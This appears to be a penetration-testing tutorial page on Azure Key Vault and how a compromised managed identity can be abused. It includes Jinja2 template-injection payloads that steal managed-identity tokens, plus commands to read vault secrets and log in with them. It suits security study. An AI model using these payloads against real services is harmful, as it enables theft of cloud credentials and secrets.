Key Vault

Key vault is Azure's service for storing secrets such as passwords, connection strings, certificates, private keys etc. With the right permissions and access, Azure resources that support managed identities (VM's App service, Functions, containers). can securely retrieve secrets from the key vault.

Identifier

Objects in a key vault are identified using a Object identifier URL. The base URL is of the format:

https://{vault-name}.vault.azure.net/{object-type}/{object-name}/{object-version}

The vault-name is globally unique. And the object-type can be "keys", "secrets" or "certificates".

Access to key vaults

Key Vaults support RBAC and access policies. So for role assignments, a application can have the "Key Vault Secrets User" or "Key Vault Administrator".

If we can compromise an azure resource whose managed identity can read secrets from a key vault, it may be possible to gain access to more resources. Note that each secret has its own IAM inherited from the key vault.

Roles who can access secrets

Abuse example

We have a App Service that is vulnerable to Jinja2 SSTI. We get a access token from vault.azure.net:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read() }}

Also, we will need to get a access_token for ARM:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read() }}

We connect with Az Cli using both tokens:

Connect-AzAccount -AccessToken $armtoken -AccountId 2e91a4fe-a0f2-46ee-8214-xxx -KeyVaultToken $token

Next, check if we have at least a reader role on a key vault:

Get-AzKeyVault


Vault Name          : vault
Resource Group Name : Research
Location            : germanywestcentral

Check if we can read Secrets:

Get-AzKeyVaultSecret -VaultName vault


Vault Name   : researchkeyvault
Name         : Reader
Version      :
Id           : https://vault.vault.azure.net:443/secrets/Reader
Enabled      : True
Expires      :
Not Before   :
Created      : 1/7/2025 8:04:22 AM
Updated      : 1/7/2025 8:04:22 AM
Content Type :
Tags         :

Finally, extract secret as plain text:

Get-AzKeyVaultSecret -VaultName xxx -Name Reader -AsPlainText
username: [email protected] ; password: Password123!

Use it to connect to Az Cli:

$passwd = ConvertTo-SecureString "Password123" -AsPlainText -Force
$creds =  New-Object System.management.automation.pscredential ("[email protected]", $passwd)
Connect-AzAccount  -Credential $creds

Last updated